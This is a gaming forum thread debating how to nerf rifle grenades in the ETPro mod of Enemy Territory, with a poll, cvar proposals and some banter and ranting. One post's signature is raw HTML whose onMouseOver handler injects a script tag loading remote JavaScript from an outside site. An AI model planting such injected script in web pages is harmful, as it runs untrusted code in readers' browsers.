I dont care
84%

Total votes: 25

Dersaidin

Rifle Granades

Post by Dersaidin »

I have and idea for the so called "Noob Nades"

In a version of ETPro Bani introduced b_maxriflegranades

I believe that a better alternative would be a cvar that enables you to set the distance on the splash damage of Riflenades. So to kill/hurt someone you need to hit much closer to them.

Positives of this:
- Many people hate the rifle nades, and call them unfair, because people can get EASY kills with them, that the other player doesnt stand a chance against. This would mean that the riflenader would have to hit much closer, so the enemy has a chance to dodge most of the blast.
- As above, dodeging becomes more of an option when fighting against a riflenader
- This would reduce the impact of most fluke shots
- This is a good compromise to the users of the riflenades who hate the idea of a limit
- Because it makes it much harder to use riflenades effectively, it may loose its n00bnade reputation.

Thank you,
|A|S|Dersaidin
www.forums.armed-squad.com
kekkyoku

Post by kekkyoku »

Wheres the option for bad idea :oops:

It would be kind of stupid if the rifle nades have a smaller blast radius then regular nades because the animation looks as though hes just loading in a regular nade into the rifle. Wouldnt make sense. Suggestions I've made in the past to keep the rifle nade but make it require a lil more finesse and timing are:

1 - Cvar that makes it take more then half or the whole charge bar

Being able to fire off two mini panzes in a row is silly.

2 - Cvar that makes it so when you hit alt fire on the rifle it loads and shoots the rifle nade

This would make it so newbs dont run around with the rifle nade loaded ready to shoot at whatever moves and might actually have to use the rifle. It would require some timing to pull off too.
Dersaidin

Post by Dersaidin »

wtf? stupid forums. i'll try to edit it :/ :oops:
Being able to fire off two mini panzes in a row is silly.
Like i said, lower the damage radius.
This would make it so newbs dont run around with the rifle nade loaded ready to shoot at whatever moves and might actually have to use the rifle. It would require some timing to pull off too.
And this would mean that it takes skill to actually hit somthing.

edit: nup, cant edit polls :/ and more :oops:

oh well, just post your arguments against if you wanna vote no, like kekkyoku just did
Kendle

Post by Kendle »

I agree completely with kekkyoku. The problem with noob-sticks (on publics) are the players who run around with 'nade loaded, ready to fire it off knee-jerk style as soon as someone starts shooting at them. They're an instant revenge weapon, cos although you'll die a lot, you'll most likely kill your killer into the bargain.

Making it so that weapalt loads AND fires the 'nade would force people to use the rifle in combat, without unduly penalising the "legitmate" use of the 'nade.

In competition noob-sticks aren't so much of a problem as here in Euro-land we're limited to 1 per team.

edit: As this is a "nerf" something thread, I expect 80% of the replies to be along the lines of "I'm so L337 noob-sticks don't bother me" :wink:
Ludvig

No Thanks

Post by Ludvig »

I'm against the optional cvars, making it possible to change the Rnades. My sole argument being that I believe the ETPro mod, was not designed for public use. The fact that alot, more than half, of all public servers run ETPro doesn't justify the ETPro team spending their time on a feature, that would only be reasonable to activate in public games.

Kind Regards
Christian Ludvigsen
SickBoy

Re: No Thanks

Post by SickBoy »

Ludvig wrote:I'm against the optional cvars, making it possible to change the Rnades. My sole argument being that I believe the ETPro mod, was not designed for public use. The fact that alot, more than half, of all public servers run ETPro doesn't justify the ETPro team spending their time on a feature, that would only be reasonable to activate in public games.

Kind Regards
Christian Ludvigsen
Why don't we just let the etpro decide for themselves what they want to spent their time on. No harm in making suggestions.

On topic: I'm so L337 noob-sticks don't bother me :)
but the idea about firing it automatically after weapalt sounds good to me, as long as you can cancel it like a panzer.
Because now the rifle nade is like a panzer without charge-up time
Ludvig

Re: No Thanks

Post by Ludvig »

SickBoy wrote:Why don't we just let the etpro decide for themselves what they want to spent their time on. No harm in making suggestions.
I'm with ya there.
next_ghost

Post by next_ghost »

Kendle wrote:I agree completely with kekkyoku. The problem with noob-sticks (on publics) are the players who run around with 'nade loaded, ready to fire it off knee-jerk style as soon as someone starts shooting at them. They're an instant revenge weapon, cos although you'll die a lot, you'll most likely kill your killer into the bargain.

Making it so that weapalt loads AND fires the 'nade would force people to use the rifle in combat, without unduly penalising the "legitmate" use of the 'nade.

In competition noob-sticks aren't so much of a problem as here in Euro-land we're limited to 1 per team.

edit: As this is a "nerf" something thread, I expect 80% of the replies to be along the lines of "I'm so L337 noob-sticks don't bother me" :wink:
Yes. Maybe make 10 second limit to fire the riflenade or it will automatically unload it. And remove the full spread override when u do this.
Rain

Post by Rain »

I'm so L337 noob-sticks don't bother me.

:D
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Neith

Post by Neith »

i'd suggest to unify nades and granades (basically they are the same thing) and to take it back to etmain (max 8 ammo x clip and lock on the clip, you can reaload the rifle only if it's clip is empty). in etmain was much more balanced because of these 2 limitations now in etpro is a little_panzer.
Deathlike M. Tito

Post by Deathlike M. Tito »

o cmon guys etpro is competition mod not public.
try to play in clan wars u will see there is only one rifle with nades per team!! isnt this inuf? cmon stop whining and play, if u dont like it there is allways alternative, RTCW!!!
bacon

Post by bacon »

Deathlike M. Tito wrote:o cmon guys etpro is competition mod not public.
try to play in clan wars u will see there is only one rifle with nades per team!! isnt this inuf? cmon stop whining and play, if u dont like it there is allways alternative, RTCW!!!
But if we can't bitch about medics/coverts/panzers/rifles what can we bitch about?????
Imbroglio

Post by Imbroglio »

<_< ..... ! FIELD OPS, those bastards can give too much ammo :shock:

it would be impossible for any single person in real life to carry around that much ammo, we need to reduce their speed or reduce the number of ammo packs they can give 8) O_o

the sad part is for being an ass that almost made sense :paranoid:
Till DEATH do us Part
Deathlike M. Tito

Post by Deathlike M. Tito »

Imbroglio wrote:<_< ..... ! FIELD OPS, those bastards can give too much ammo :shock:

it would be impossible for any single person in real life to carry around that much ammo, we need to reduce their speed or reduce the number of ammo packs they can give 8) O_o

the sad part is for being an ass that almost made sense :paranoid:
aint the real life FPS game !! and stop bitching for everything or stop playn et :P
Imbroglio

Post by Imbroglio »

Imbroglio wrote:for being an ass
i wasn't serious :\

this post was more of an insult directed towards the ppl that constantly have problems with games in which they aren't the best, the main ppl that bitch are the quakers that can handle a normal smg, but all of the sudden you throw in panzers and rifle nades along with prone, shit, their ass is grass, then to top it off they are usually the nurses that hoard ammo at the racks even during clan matches, they are the ones with fixed yaw and they'd have to scroll down 50 times in order to even come close to shooting a prone player, so rather than fix it they bitch, the reason you didn't get as much bitching with RTCW is because you had to buy it, or had to be a knowledgable warez weenie, but either way the game was what it was, and things like banimod and osp just made it such a great game, now all of the sudden the game is free and ppl feel inclined to bitch about everything, i used to frequent these forums on a weekly basis, but after ET, every other post is somebody complaining and its pretty pathetic if you ask me, rather than bitch to bani or rain or zinx or whoever to fix things, why don't you think of a practical and fair solution and suggest it, stating that you think the current way is a flaw, alright time for me to stop rambling... go ahead and flame me if you want, personally idc, if it increases the size of your netdick then more power to you :?

btw - this flame wasn't in anyway directed to the creator of this topic, it was more addressed to the general public, i think this topic's creator is the epitome of how ppl should respond to possible problems 8)
Till DEATH do us Part